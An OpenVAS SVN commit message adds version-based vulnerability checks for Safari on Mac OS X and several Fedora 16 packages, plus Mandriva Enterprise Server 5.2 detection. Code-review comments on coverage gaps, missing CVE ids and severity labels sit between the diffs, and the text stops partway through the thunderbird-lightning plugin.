[Openvas-commits] r13810 - in trunk/openvas-plugins: . scripts
scm-commit at wald.intevation.org
scm-commit at wald.intevation.org
Tue Jul 31 15:07:27 CEST 2012
Author: antu123
Date: 2012-07-31 15:07:25 +0200 (Tue, 31 Jul 2012)
New Revision: 13810
Added:
trunk/openvas-plugins/scripts/gb_apple_safari_mult_vuln_jul12_macosx.nasl
trunk/openvas-plugins/scripts/gb_fedora_2012_10411_kdepim_fc16.nasl
trunk/openvas-plugins/scripts/gb_fedora_2012_10727_ganglia_fc16.nasl
trunk/openvas-plugins/scripts/gb_fedora_2012_10819_exif_fc16.nasl
trunk/openvas-plugins/scripts/gb_fedora_2012_10822_firefox_fc16.nasl
trunk/openvas-plugins/scripts/gb_fedora_2012_10822_thunderbird-lightning_fc16.nasl
trunk/openvas-plugins/scripts/gb_fedora_2012_10822_thunderbird_fc16.nasl
trunk/openvas-plugins/scripts/gb_fedora_2012_10822_xulrunner_fc16.nasl
trunk/openvas-plugins/scripts/gb_fedora_2012_10829_seamonkey_fc16.nasl
trunk/openvas-plugins/scripts/gb_fedora_2012_10887_nsd_fc16.nasl
trunk/openvas-plugins/scripts/gb_fedora_2012_10897_puppet_fc16.nasl
trunk/openvas-plugins/scripts/gb_fedora_2012_10929_bacula_fc16.nasl
trunk/openvas-plugins/scripts/gb_fedora_2012_10934_dropbear_fc16.nasl
trunk/openvas-plugins/scripts/gb_httpdx_post_req_bof_vuln.nasl
trunk/openvas-plugins/scripts/gb_httpdx_wildcards_remote_dos_vuln.nasl
trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_112.nasl
trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_113.nasl
trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_115.nasl
trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_117.nasl
trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_119.nasl
trunk/openvas-plugins/scripts/gb_ms_win_media_service_handshake_seq_dos_vuln.nasl
trunk/openvas-plugins/scripts/gb_ubuntu_USN_1518_1.nasl
trunk/openvas-plugins/scripts/gb_ubuntu_USN_1519_1.nasl
trunk/openvas-plugins/scripts/gb_wireshark_asn1ber_dissector_dos_vuln_mac.nasl
trunk/openvas-plugins/scripts/gb_wireshark_mac_lte_dissector_bof_vuln_mac.nasl
Modified:
trunk/openvas-plugins/ChangeLog
trunk/openvas-plugins/scripts/gather-package-list.nasl
trunk/openvas-plugins/scripts/gb_httpdx_server_detect.nasl
Log:
Added new plugins and new auto-generated plugins.
Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog 2012-07-31 08:12:11 UTC (rev 13809)
+++ trunk/openvas-plugins/ChangeLog 2012-07-31 13:07:25 UTC (rev 13810)
@@ -1,5 +1,42 @@
2012-07-31 Antu Sanadi <santu at secpod.com>
+ * scripts/gb_httpdx_wildcards_remote_dos_vuln.nasl,
+ scripts/gb_httpdx_post_req_bof_vuln.nasl,
+ scripts/gb_apple_safari_mult_vuln_jul12_macosx.nasl,
+ scripts/gb_ms_win_media_service_handshake_seq_dos_vuln.nasl,
+ scripts/gb_wireshark_mac_lte_dissector_bof_vuln_mac.nasl,
+ scripts/gb_wireshark_asn1ber_dissector_dos_vuln_mac.nasl:
+ Added new plugins.
+
+ * scripts/gb_httpdx_server_detect.nasl:
+ Updated to modern product detection.
+
+ * scripts/gb_fedora_2012_10727_ganglia_fc16.nasl,
+ scripts/gb_fedora_2012_10822_firefox_fc16.nasl,
+ scripts/gb_fedora_2012_10822_thunderbird_fc16.nasl,
+ scripts/gb_fedora_2012_10822_thunderbird-lightning_fc16.nasl,
+ scripts/gb_fedora_2012_10822_xulrunner_fc16.nasl,
+ scripts/gb_ubuntu_USN_1518_1.nasl,
+ scripts/gb_ubuntu_USN_1519_1.nasl,
+ scripts/gb_fedora_2012_10411_kdepim_fc16.nasl,
+ scripts/gb_fedora_2012_10819_exif_fc16.nasl,
+ scripts/gb_fedora_2012_10829_seamonkey_fc16.nasl,
+ scripts/gb_fedora_2012_10887_nsd_fc16.nasl,
+ scripts/gb_fedora_2012_10897_puppet_fc16.nasl,
+ scripts/gb_fedora_2012_10929_bacula_fc16.nasl,
+ scripts/gb_fedora_2012_10934_dropbear_fc16.nasl,
+ scripts/gb_mandriva_MDVSA_2012_112.nasl,
+ scripts/gb_mandriva_MDVSA_2012_113.nasl,
+ scripts/gb_mandriva_MDVSA_2012_115.nasl,
+ scripts/gb_mandriva_MDVSA_2012_117.nasl,
+ scripts/gb_mandriva_MDVSA_2012_119.nasl:
+ Added new auto generated pllugins.
+
+ * scripts/gather-package-list.nasl:
+ Updated to support for mandriva enterprise server 5.2
+
+2012-07-31 Antu Sanadi <santu at secpod.com>
+
* scripts/kerio_wrf_management_detection.nasl,
scripts/ldap_null_base.nasl,
scripts/linux_icmp_sctp_DoS.nasl,
Modified: trunk/openvas-plugins/scripts/gather-package-list.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gather-package-list.nasl 2012-07-31 08:12:11 UTC (rev 13809)
+++ trunk/openvas-plugins/scripts/gather-package-list.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -124,6 +124,7 @@
"MNDK_2010.1", "cpe:/o:mandriva:linux:2010.1",
"MNDK_2011.0", "cpe:/o:mandriva:linux:2011.0",
"MNDK_mes5", "cpe:/o:mandriva:enterprise_server:5",
+ "MNDK_mes5.2", "cpe:/o:mandriva:enterprise_server:5",
# CentOS
"CentOS2", "cpe:/o:centos:centos:2",
@@ -453,6 +454,14 @@
exit(0);
}
+if("Mandriva Linux Enterprise Server release 5.2" >< rls) {
+ buf = ssh_cmd(socket:sock, cmd:"/bin/rpm -qa --qf '%{NAME}~%{VERSION}~%{RELEASE};'");
+ set_kb_item(name: "ssh/login/rpms", value: ";" + buf);
+ log_message(port:port, data:string("We are able to login and detect that you are running ", rls));
+ register_detected_os(os:rls, oskey:"MNDK_mes5.2");
+ exit(0);
+}
+
if("Mandriva Linux release 2011.0" >< rls) {
buf = ssh_cmd(socket:sock, cmd:"/bin/rpm -qa --qf '%{NAME}~%{VERSION}~%{RELEASE};'");
set_kb_item(name: "ssh/login/rpms", value: ";" + buf);
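Review bot: The new branch registers the host under `oskey:"MNDK_mes5.2"`, so any package check that compares the release key against the literal `MNDK_mes5` will stop matching Enterprise Server 5.2 hosts. That is a silent loss of coverage unless every Mandriva check is regenerated with the new key. The Fedora checks in this commit compare `ssh/login/release` against a literal in this way, but whether `register_detected_os` writes that key is not visible here, so confirm it. Because `><` is a substring match, a branch testing `Mandriva Linux Enterprise Server release 5` that sits earlier in the file would match 5.2 first and make this one unreachable; the preceding branch lies outside the hunk, so check the order. The earlier hunk maps the new key to the same CPE as `MNDK_mes5`; if that is intended, a comment such as `# 5.2 shares the enterprise_server:5 CPE on purpose` would make it explicit.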
Added: trunk/openvas-plugins/scripts/gb_apple_safari_mult_vuln_jul12_macosx.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_apple_safari_mult_vuln_jul12_macosx.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_apple_safari_mult_vuln_jul12_macosx.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,142 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Apple Safari Multiple Vulnerabilities - July 2012 (Mac OS X)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(802924);
+ script_version("$Revision$");
+ script_cve_id("CVE-2011-3426", "CVE-2011-3016", "CVE-2011-3021", "CVE-2011-3027",
+ "CVE-2011-3032", "CVE-2011-3034", "CVE-2011-3035", "CVE-2011-3036",
+ "CVE-2011-3037", "CVE-2011-3038", "CVE-2011-3039", "CVE-2011-3040",
+ "CVE-2011-3041", "CVE-2011-3042", "CVE-2011-3043", "CVE-2011-3044",
+ "CVE-2011-3050", "CVE-2011-3053", "CVE-2011-3059", "CVE-2011-3060",
+ "CVE-2011-3064", "CVE-2011-3068", "CVE-2011-3069", "CVE-2011-3071",
+ "CVE-2011-3073", "CVE-2011-3074", "CVE-2011-3075", "CVE-2011-3076",
+ "CVE-2011-3078", "CVE-2011-3081", "CVE-2011-3086", "CVE-2011-3089",
+ "CVE-2011-3090", "CVE-2011-3913", "CVE-2011-3924", "CVE-2011-3926",
+ "CVE-2011-3958", "CVE-2011-3966", "CVE-2011-3968", "CVE-2011-3969",
+ "CVE-2011-3971", "CVE-2011-3067", "CVE-2011-2845", "CVE-2012-0678",
+ "CVE-2012-0679", "CVE-2012-0680", "CVE-2012-0682", "CVE-2012-0683",
+ "CVE-2012-1520", "CVE-2012-1521", "CVE-2012-3589", "CVE-2012-3590",
+ "CVE-2012-3591", "CVE-2012-3592", "CVE-2012-3593", "CVE-2012-3594",
+ "CVE-2012-3595", "CVE-2012-3596", "CVE-2012-3597", "CVE-2012-3599",
+ "CVE-2012-3600", "CVE-2012-3603", "CVE-2012-3604", "CVE-2012-3605",
+ "CVE-2012-3608", "CVE-2012-3609", "CVE-2012-3610", "CVE-2012-3611",
+ "CVE-2012-3615", "CVE-2012-3618", "CVE-2012-3620", "CVE-2012-3625",
+ "CVE-2012-3626", "CVE-2012-3627", "CVE-2012-3628", "CVE-2012-3629",
+ "CVE-2012-3630", "CVE-2012-3631", "CVE-2012-3633", "CVE-2012-3634",
+ "CVE-2012-3635", "CVE-2012-3636", "CVE-2012-3637", "CVE-2012-3638",
+ "CVE-2012-3639", "CVE-2012-3640", "CVE-2012-3641", "CVE-2012-3642",
+ "CVE-2012-3644", "CVE-2012-3645", "CVE-2012-3646", "CVE-2012-3653",
+ "CVE-2012-3655", "CVE-2012-3656", "CVE-2012-3661", "CVE-2012-3663",
+ "CVE-2012-3664", "CVE-2012-3665", "CVE-2012-3666", "CVE-2012-3667",
+ "CVE-2012-3668", "CVE-2012-3669", "CVE-2012-3670", "CVE-2012-3674",
+ "CVE-2012-3678", "CVE-2012-3679", "CVE-2012-3680", "CVE-2012-3681",
+ "CVE-2012-3682", "CVE-2012-3683", "CVE-2012-3686", "CVE-2012-3689",
+ "CVE-2012-3690", "CVE-2012-3691", "CVE-2012-2815", "CVE-2012-3693",
+ "CVE-2012-3694", "CVE-2012-3695", "CVE-2012-3696", "CVE-2012-3697",
+ "CVE-2012-3650");
+ script_bugtraq_id(50124, 52031, 52271, 52674, 52762, 52913, 53309, 53540, 51041,
+ 51641, 51911, 50360, 54683, 54692, 54688, 54680, 54686, 54696,
+ 54687, 54203, 54693, 54694, 54695, 54700, 54697, 54703);
+ script_tag(name:"cvss_base", value:"9.3");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:C/I:C/A:C");
+ script_tag(name:"risk_factor", value:"Critical");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-30 16:35:41 +0530 (Mon, 30 Jul 2012)");
+ script_name("Apple Safari Multiple Vulnerabilities - July 2012 (Mac OS X)");
+ desc = "
+ Overview: This host is installed with Apple Safari web browser and is prone
+ to multiple vulnerabilities.
+
+ Vulnerability Insight:
+ For more details about the vulnerabilities refer the reference section.
+
+ Impact:
+ Successful exploitation will let the attacker to disclose potentially
+ sensitive information, conduct cross-site scripting and compromise a user's
+ system.
+
+ Impact Level: System/Application
+
+ Affected Software/OS:
+ Apple Safari versions prior to 6.0
+
+ Fix: Upgrade to Apple Safari version 6.0 or later,
+ For updates refer, http://www.apple.com/safari/download/
+
+ References:
+ http://support.apple.com/kb/HT5400
+ http://secunia.com/advisories/50058/
+ http://securitytracker.com/id/1027307
+ http://lists.apple.com/archives/security-announce/2012/Jul/msg00000.html ";
+
+ script_description(desc);
+ script_summary("Check for the version of Apple Safari on Mac OS X");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (C) 2012 Greenbone Networks GmbH");
+ script_family("General");
+ script_dependencies("macosx_safari_detect.nasl");
+ script_require_keys("AppleSafari/MacOSX/Version");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+osName = "";
+osVer = "";
+safVer = "";
+
+## Get the OS name
+osName = get_kb_item("ssh/login/osx_name");
+if(!osName){
+ exit (0);
+}
+
+## Get the OS Version
+osVer = get_kb_item("ssh/login/osx_version");
+if(!osVer){
+ exit(0);
+}
+
+## Check for the Mac OS X and Mac OS X Server
+if("Mac OS X" >< osName)
+{
+ ## Check the affected OS versions
+ if(version_is_equal(version:osVer, test_version:"10.7.4"))
+ {
+ safVer = get_kb_item("AppleSafari/MacOSX/Version");
+ if(!safVer){
+ exit(0);
+ }
+
+ ## Grep for Apple Safari Versions prior to 6.0
+ if(version_is_less(version:safVer, test_version:"6.0")){
+ security_hole(0);
+ }
+ }
+}
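Review bot: The OS gate `version_is_equal(version:osVer, test_version:"10.7.4")` means the Safari version is only evaluated on hosts running exactly Mac OS X 10.7.4, while the description lists every Safari version prior to 6.0 as affected. A host on any other OS X release with an older Safari gets no result from this check, which reads as a false negative unless the restriction is intentional. If it is deliberate (the file does not say why), a comment above the condition should state the reason; otherwise the Safari comparison should not depend on an exact OS match. Separately, `script_require_keys` names only `AppleSafari/MacOSX/Version` although the script also exits silently when `ssh/login/osx_name` or `ssh/login/osx_version` is missing.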
Property changes on: trunk/openvas-plugins/scripts/gb_apple_safari_mult_vuln_jul12_macosx.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_fedora_2012_10411_kdepim_fc16.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2012_10411_kdepim_fc16.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_fedora_2012_10411_kdepim_fc16.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,93 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for kdepim FEDORA-2012-10411
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+ KDE PIM (Personal Information Manager) applications, including:
+ * akregator: feed aggregator
+ * blogilo: blogging application, focused on simplicity and usability
+ * kmail: email client
+ * knode: newsreader
+ * knotes: sticky notes for the desktop
+ * kontact: integrated PIM management
+ * korganizer: journal, appointments, events, todos
+
+
+ Affected Software/OS:
+ kdepim on Fedora 16
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2012-July/084262.html ";
+
+if(description)
+{
+ script_id(864574);
+ script_version("$Revision$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-30 11:18:09 +0530 (Mon, 30 Jul 2012)");
+ script_cve_id("CVE-2012-3413");
+ script_tag(name:"cvss_base", value:"7.8");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:C");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2012-10411");
+ script_name("Fedora Update for kdepim FEDORA-2012-10411");
+
+ script_description(desc);
+ script_summary("Check for the Version of kdepim");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("HostDetails/OS/cpe:/o:fedoraproject:fedora", "login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC16")
+{
+
+ if ((res = isrpmvuln(pkg:"kdepim", rpm:"kdepim~4.8.4~4.fc16", rls:"FC16")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
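Review bot: The `Vulnerability Insight:` section of `desc` holds the package summary (the list of KDE PIM applications) and says nothing about the flaw being fixed, so a report reader learns about the issue only through the CVE id and the reference URL. The same applies to the `desc` text of the ganglia, exif, firefox, thunderbird-lightning, thunderbird and xulrunner checks added in this commit. Because this text is emitted with the finding via `security_hole(data:res + '\n' + desc)`, the generator template should either fill the section from the advisory text or label it for what it is, for example `Package description:`.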
Property changes on: trunk/openvas-plugins/scripts/gb_fedora_2012_10411_kdepim_fc16.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_fedora_2012_10727_ganglia_fc16.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2012_10727_ganglia_fc16.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_fedora_2012_10727_ganglia_fc16.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,87 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for ganglia FEDORA-2012-10727
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+ Ganglia is a scalable, real-time monitoring and execution environment
+ with all execution requests and statistics expressed in an open
+ well-defined XML format.
+
+
+ Affected Software/OS:
+ ganglia on Fedora 16
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2012-July/084196.html ";
+
+if(description)
+{
+ script_id(864559);
+ script_version("$Revision$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-26 11:09:15 +0530 (Thu, 26 Jul 2012)");
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2012-10727");
+ script_name("Fedora Update for ganglia FEDORA-2012-10727");
+
+ script_description(desc);
+ script_summary("Check for the Version of ganglia");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("HostDetails/OS/cpe:/o:fedoraproject:fedora", "login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC16")
+{
+
+ if ((res = isrpmvuln(pkg:"ganglia", rpm:"ganglia~3.1.7~5.fc16", rls:"FC16")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
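Review bot: This check has no `script_cve_id(...)` call although it asserts `cvss_base` 7.5 with a full vector, so the score cannot be traced to an identifier and results cannot be correlated by CVE; the kdepim and exif checks in the same commit do set one. The firefox, thunderbird-lightning and thunderbird checks have the same gap. If the advisory names CVEs, add the call after the `creation_date` tag as the kdepim check does; if it does not, a comment stating where the 7.5 score comes from would help.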
Property changes on: trunk/openvas-plugins/scripts/gb_fedora_2012_10727_ganglia_fc16.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_fedora_2012_10819_exif_fc16.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2012_10819_exif_fc16.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_fedora_2012_10819_exif_fc16.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,87 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for exif FEDORA-2012-10819
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+ Small command-line utility to show EXIF information hidden
+ in JPEG files.
+
+
+ Affected Software/OS:
+ exif on Fedora 16
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2012-July/084273.html ";
+
+if(description)
+{
+ script_id(864571);
+ script_version("$Revision$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-30 11:18:06 +0530 (Mon, 30 Jul 2012)");
+ script_cve_id("CVE-2012-2845");
+ script_tag(name:"cvss_base", value:"6.4");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:P");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2012-10819");
+ script_name("Fedora Update for exif FEDORA-2012-10819");
+
+ script_description(desc);
+ script_summary("Check for the Version of exif");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("HostDetails/OS/cpe:/o:fedoraproject:fedora", "login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC16")
+{
+
+ if ((res = isrpmvuln(pkg:"exif", rpm:"exif~0.6.21~1.fc16", rls:"FC16")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
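Review bot: `risk_factor` is set to `High` while `cvss_base` is 6.4, and the checks in this commit with scores of 7.5 and 7.8 are also labelled `High`; under the usual CVSS v2 bands 6.4 falls in the medium range. If the generator derives the label from the score, its threshold looks off for this case; if the label is taken from the advisory, a comment saying so would avoid the apparent mismatch. The finding is also reported through `security_hole(...)`, which should follow whichever severity is intended.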
Property changes on: trunk/openvas-plugins/scripts/gb_fedora_2012_10819_exif_fc16.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_fedora_2012_10822_firefox_fc16.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2012_10822_firefox_fc16.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_fedora_2012_10822_firefox_fc16.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,86 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for firefox FEDORA-2012-10822
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+ Mozilla Firefox is an open-source web browser, designed for standards
+ compliance, performance and portability.
+
+
+ Affected Software/OS:
+ firefox on Fedora 16
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2012-July/084177.html ";
+
+if(description)
+{
+ script_id(864562);
+ script_version("$Revision$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-26 11:09:15 +0530 (Thu, 26 Jul 2012)");
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2012-10822");
+ script_name("Fedora Update for firefox FEDORA-2012-10822");
+
+ script_description(desc);
+ script_summary("Check for the Version of firefox");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("HostDetails/OS/cpe:/o:fedoraproject:fedora", "login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC16")
+{
+
+ if ((res = isrpmvuln(pkg:"firefox", rpm:"firefox~14.0.1~1.fc16", rls:"FC16")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_fedora_2012_10822_firefox_fc16.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_fedora_2012_10822_thunderbird-lightning_fc16.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2012_10822_thunderbird-lightning_fc16.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_fedora_2012_10822_thunderbird-lightning_fc16.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,88 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for thunderbird-lightning FEDORA-2012-10822
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+ Lightning brings the Sunbird calendar to the popular email client,
+ Mozilla Thunderbird. Since it's an extension, Lightning is tightly
+ integrated with Thunderbird, allowing it to easily perform email-related
+ calendaring tasks.
+
+
+ Affected Software/OS:
+ thunderbird-lightning on Fedora 16
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2012-July/084175.html ";
+
+if(description)
+{
+ script_id(864560);
+ script_version("$Revision$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-26 11:09:15 +0530 (Thu, 26 Jul 2012)");
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2012-10822");
+ script_name("Fedora Update for thunderbird-lightning FEDORA-2012-10822");
+
+ script_description(desc);
